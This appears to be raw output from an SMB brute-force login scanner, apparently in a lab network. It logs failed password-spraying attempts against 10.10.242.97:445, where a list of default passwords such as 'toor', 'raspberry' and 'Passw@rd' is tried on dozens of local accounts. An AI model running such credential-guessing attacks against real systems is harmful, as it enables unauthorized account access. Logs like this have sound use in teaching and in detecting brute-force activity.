[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmiebar:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\jimmypor:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\josebyr:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juanitaram:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\juliocra:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kayhar:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kellyjen:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kittymar:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\kristinfre:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahbur:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\leahlar:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lenamoo:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\lesarog:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\maegut:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\marjorieada:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\masonmor:qwerty',
